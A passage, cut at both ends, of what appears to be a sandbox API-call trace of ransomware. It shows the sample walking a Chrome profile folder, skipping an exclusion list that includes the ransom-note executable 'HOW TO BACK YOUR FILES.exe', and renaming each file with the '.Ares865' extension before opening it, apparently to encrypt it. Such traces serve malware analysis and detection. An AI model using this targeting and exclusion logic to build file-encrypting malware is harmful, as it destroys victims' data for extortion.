Predictor", lpString2="ids.txt") returned 1 [0099.846] lstrcmpiW (lpString1="Network Action Predictor", lpString2="ntuser.dat") returned -1 [0099.846] lstrcmpiW (lpString1="Network Action Predictor", lpString2="perflogs") returned -1 [0099.846] lstrcmpiW (lpString1="Network Action Predictor", lpString2="MSBuild") returned 1 [0099.846] lstrlenW (lpString="Network Action Predictor") returned 24 [0099.846] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Login Data-journal") returned 95 [0099.846] lstrcpyW (in: lpString1=0x2cce49a, lpString2="Network Action Predictor" | out: lpString1="Network Action Predictor") returned="Network Action Predictor" [0099.846] lstrlenW (lpString="Network Action Predictor") returned 24 [0099.846] lstrlenW (lpString="Ares865") returned 7 [0099.846] lstrcmpiW (lpString1="edictor", lpString2="Ares865") returned 1 [0099.846] lstrlenW (lpString=".dll") returned 4 [0099.846] lstrcmpiW (lpString1="Network Action Predictor", lpString2=".dll") returned 1 [0099.846] lstrlenW (lpString=".lnk") returned 4 [0099.846] lstrcmpiW (lpString1="Network Action Predictor", lpString2=".lnk") returned 1 [0099.846] lstrlenW (lpString=".ini") returned 4 [0099.846] lstrcmpiW (lpString1="Network Action Predictor", lpString2=".ini") returned 1 [0099.846] lstrlenW (lpString=".sys") returned 4 [0099.846] lstrcmpiW (lpString1="Network Action Predictor", lpString2=".sys") returned 1 [0099.846] lstrlenW (lpString="Network Action Predictor") returned 24 [0099.847] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Network Action Predictor.Ares865") returned 109 [0099.847] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Network Action Predictor" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\network action predictor"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Network Action Predictor.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\network action predictor.ares865"), dwFlags=0x1) returned 1 [0099.848] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Network Action Predictor.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\network action predictor.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.848] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15360) returned 1 [0099.853] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal.Ares865") returned 117 [0099.853] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\network action predictor-journal"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\network action predictor-journal.ares865"), dwFlags=0x1) returned 1 [0099.854] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\network action predictor-journal.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.854] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.854] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.854] CloseHandle (hObject=0x0) returned 0 [0099.854] CloseHandle (hObject=0x118) returned 1 [0099.855] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86263d70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x86263d70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x4de4f920, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x330, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Network Persistent State.Ares865", cAlternateFileName="NETWOR~1.ARE")) returned 1 [0099.855] lstrcmpiW (lpString1="Network Persistent State.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.855] lstrcmpiW (lpString1="Network Persistent State.Ares865", lpString2="aoldtz.exe") returned 1 [0099.855] lstrcmpiW (lpString1="Network Persistent State.Ares865", lpString2=".") returned 1 [0099.855] lstrcmpiW (lpString1="Network Persistent State.Ares865", lpString2="..") returned 1 [0099.855] lstrcmpiW (lpString1="Network Persistent State.Ares865", lpString2="windows") returned -1 [0099.855] lstrcmpiW (lpString1="Network Persistent State.Ares865", lpString2="bootmgr") returned 1 [0099.855] lstrcmpiW (lpString1="Network Persistent State.Ares865", lpString2="temp") returned -1 [0099.855] lstrcmpiW (lpString1="Network Persistent State.Ares865", lpString2="pagefile.sys") returned -1 [0099.855] lstrcmpiW (lpString1="Network Persistent State.Ares865", lpString2="boot") returned 1 [0099.855] lstrcmpiW (lpString1="Network Persistent State.Ares865", lpString2="ids.txt") returned 1 [0099.855] lstrcmpiW (lpString1="Network Persistent State.Ares865", lpString2="ntuser.dat") returned -1 [0099.855] lstrcmpiW (lpString1="Network Persistent State.Ares865", lpString2="perflogs") returned -1 [0099.855] lstrcmpiW (lpString1="Network Persistent State.Ares865", lpString2="MSBuild") returned 1 [0099.855] lstrlenW (lpString="Network Persistent State.Ares865") returned 32 [0099.855] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Network Action Predictor-journal") returned 109 [0099.855] lstrcpyW (in: lpString1=0x2cce49a, lpString2="Network Persistent State.Ares865" | out: lpString1="Network Persistent State.Ares865") returned="Network Persistent State.Ares865" [0099.855] lstrlenW (lpString="Network Persistent State.Ares865") returned 32 [0099.855] lstrlenW (lpString="Ares865") returned 7 [0099.855] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0099.855] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x81d16a10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x81d16a10, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x94034050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Origin Bound Certs", cAlternateFileName="ORIGIN~1")) returned 1 [0099.855] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.855] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="aoldtz.exe") returned 1 [0099.855] lstrcmpiW (lpString1="Origin Bound Certs", lpString2=".") returned 1 [0099.855] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="..") returned 1 [0099.855] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="windows") returned -1 [0099.855] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="bootmgr") returned 1 [0099.855] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="temp") returned -1 [0099.855] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="pagefile.sys") returned -1 [0099.855] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="boot") returned 1 [0099.855] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="ids.txt") returned 1 [0099.855] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="ntuser.dat") returned 1 [0099.855] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="perflogs") returned -1 [0099.855] lstrcmpiW (lpString1="Origin Bound Certs", lpString2="MSBuild") returned 1 [0099.856] lstrlenW (lpString="Origin Bound Certs") returned 18 [0099.856] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Network Persistent State.Ares865") returned 109 [0099.856] lstrcpyW (in: lpString1=0x2cce49a, lpString2="Origin Bound Certs" | out: lpString1="Origin Bound Certs") returned="Origin Bound Certs" [0099.856] lstrlenW (lpString="Origin Bound Certs") returned 18 [0099.856] lstrlenW (lpString="Ares865") returned 7 [0099.856] lstrcmpiW (lpString1="d Certs", lpString2="Ares865") returned 1 [0099.856] lstrlenW (lpString=".dll") returned 4 [0099.856] lstrcmpiW (lpString1="Origin Bound Certs", lpString2=".dll") returned 1 [0099.856] lstrlenW (lpString=".lnk") returned 4 [0099.856] lstrcmpiW (lpString1="Origin Bound Certs", lpString2=".lnk") returned 1 [0099.856] lstrlenW (lpString=".ini") returned 4 [0099.856] lstrcmpiW (lpString1="Origin Bound Certs", lpString2=".ini") returned 1 [0099.856] lstrlenW (lpString=".sys") returned 4 [0099.856] lstrcmpiW (lpString1="Origin Bound Certs", lpString2=".sys") returned 1 [0099.856] lstrlenW (lpString="Origin Bound Certs") returned 18 [0099.856] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs.Ares865") returned 103 [0099.856] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\origin bound certs"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\origin bound certs.ares865"), dwFlags=0x1) returned 1 [0099.857] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\origin bound certs.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.858] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5120) returned 1 [0099.861] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal.Ares865") returned 111 [0099.861] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\origin bound certs-journal"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\origin bound certs-journal.ares865"), dwFlags=0x1) returned 1 [0099.863] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\origin bound certs-journal.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.863] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.863] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.863] CloseHandle (hObject=0x0) returned 0 [0099.864] CloseHandle (hObject=0x118) returned 1 [0099.864] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859aa710, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x9c43f3e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c446910, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x1a9d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Preferences", cAlternateFileName="PREFER~1")) returned 1 [0099.864] lstrcmpiW (lpString1="Preferences", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.864] lstrcmpiW (lpString1="Preferences", lpString2="aoldtz.exe") returned 1 [0099.864] lstrcmpiW (lpString1="Preferences", lpString2=".") returned 1 [0099.864] lstrcmpiW (lpString1="Preferences", lpString2="..") returned 1 [0099.864] lstrcmpiW (lpString1="Preferences", lpString2="windows") returned -1 [0099.864] lstrcmpiW (lpString1="Preferences", lpString2="bootmgr") returned 1 [0099.864] lstrcmpiW (lpString1="Preferences", lpString2="temp") returned -1 [0099.864] lstrcmpiW (lpString1="Preferences", lpString2="pagefile.sys") returned 1 [0099.864] lstrcmpiW (lpString1="Preferences", lpString2="boot") returned 1 [0099.864] lstrcmpiW (lpString1="Preferences", lpString2="ids.txt") returned 1 [0099.864] lstrcmpiW (lpString1="Preferences", lpString2="ntuser.dat") returned 1 [0099.864] lstrcmpiW (lpString1="Preferences", lpString2="perflogs") returned 1 [0099.864] lstrcmpiW (lpString1="Preferences", lpString2="MSBuild") returned 1 [0099.864] lstrlenW (lpString="Preferences") returned 11 [0099.864] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal") returned 103 [0099.864] lstrcpyW (in: lpString1=0x2cce49a, lpString2="Preferences" | out: lpString1="Preferences") returned="Preferences" [0099.864] lstrlenW (lpString="Preferences") returned 11 [0099.864] lstrlenW (lpString="Ares865") returned 7 [0099.864] lstrcmpiW (lpString1="erences", lpString2="Ares865") returned 1 [0099.864] lstrlenW (lpString=".dll") returned 4 [0099.864] lstrcmpiW (lpString1="Preferences", lpString2=".dll") returned 1 [0099.864] lstrlenW (lpString=".lnk") returned 4 [0099.864] lstrcmpiW (lpString1="Preferences", lpString2=".lnk") returned 1 [0099.864] lstrlenW (lpString=".ini") returned 4 [0099.864] lstrcmpiW (lpString1="Preferences", lpString2=".ini") returned 1 [0099.864] lstrlenW (lpString=".sys") returned 4 [0099.864] lstrcmpiW (lpString1="Preferences", lpString2=".sys") returned 1 [0099.864] lstrlenW (lpString="Preferences") returned 11 [0099.865] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Preferences.Ares865") returned 96 [0099.865] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\preferences"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Preferences.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\preferences.ares865"), dwFlags=0x1) returned 1 [0099.866] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Preferences.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\preferences.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.867] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=6813) returned 1 [0099.870] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\QuotaManager.Ares865") returned 97 [0099.870] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\QuotaManager" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\quotamanager"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\QuotaManager.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\quotamanager.ares865"), dwFlags=0x1) returned 1 [0099.871] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\QuotaManager.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\quotamanager.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.872] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15360) returned 1 [0099.876] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal.Ares865") returned 105 [0099.876] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\quotamanager-journal"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\quotamanager-journal.ares865"), dwFlags=0x1) returned 1 [0099.877] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\QuotaManager-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\quotamanager-journal.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.877] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.877] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.877] CloseHandle (hObject=0x0) returned 0 [0099.877] CloseHandle (hObject=0x118) returned 1 [0099.877] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f846500, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7f846500, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7f846500, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="README", cAlternateFileName="")) returned 1 [0099.877] lstrcmpiW (lpString1="README", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.877] lstrcmpiW (lpString1="README", lpString2="aoldtz.exe") returned 1 [0099.877] lstrcmpiW (lpString1="README", lpString2=".") returned 1 [0099.878] lstrcmpiW (lpString1="README", lpString2="..") returned 1 [0099.878] lstrcmpiW (lpString1="README", lpString2="windows") returned -1 [0099.878] lstrcmpiW (lpString1="README", lpString2="bootmgr") returned 1 [0099.878] lstrcmpiW (lpString1="README", lpString2="temp") returned -1 [0099.878] lstrcmpiW (lpString1="README", lpString2="pagefile.sys") returned 1 [0099.878] lstrcmpiW (lpString1="README", lpString2="boot") returned 1 [0099.878] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\README.Ares865") returned 91 [0099.878] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\README" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\readme"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\README.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\readme.ares865"), dwFlags=0x1) returned 1 [0099.879] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\README.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\readme.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.879] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=180) returned 1 [0099.883] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Secure Preferences.Ares865") returned 103 [0099.883] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Secure Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\secure preferences"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Secure Preferences.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\secure preferences.ares865"), dwFlags=0x1) returned 1 [0099.884] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Secure Preferences.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\secure preferences.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.885] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=35651) returned 1 [0099.889] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Shortcuts.Ares865") returned 94 [0099.889] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Shortcuts" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\shortcuts"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Shortcuts.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\shortcuts.ares865"), dwFlags=0x1) returned 1 [0099.890] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Shortcuts.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\shortcuts.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.890] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12288) returned 1 [0099.895] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal.Ares865") returned 102 [0099.895] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\shortcuts-journal"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\shortcuts-journal.ares865"), dwFlags=0x1) returned 1 [0099.896] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Shortcuts-journal.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\shortcuts-journal.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.897] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.897] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.897] CloseHandle (hObject=0x0) returned 0 [0099.897] CloseHandle (hObject=0x118) returned 1 [0099.897] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x84251e10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4de9bbe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4de9bbe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sync Extension Settings", cAlternateFileName="SYNCEX~1")) returned 1 [0099.897] lstrcmpiW (lpString1="Sync Extension Settings", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.897] lstrcmpiW (lpString1="Sync Extension Settings", lpString2="aoldtz.exe") returned 1 [0099.897] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Top Sites.Ares865") returned 94 [0099.897] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Top Sites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\top sites"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Top Sites.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\top sites.ares865"), dwFlags=0x1) returned 1 [0099.898] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Top Sites.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\top sites.ares865"), 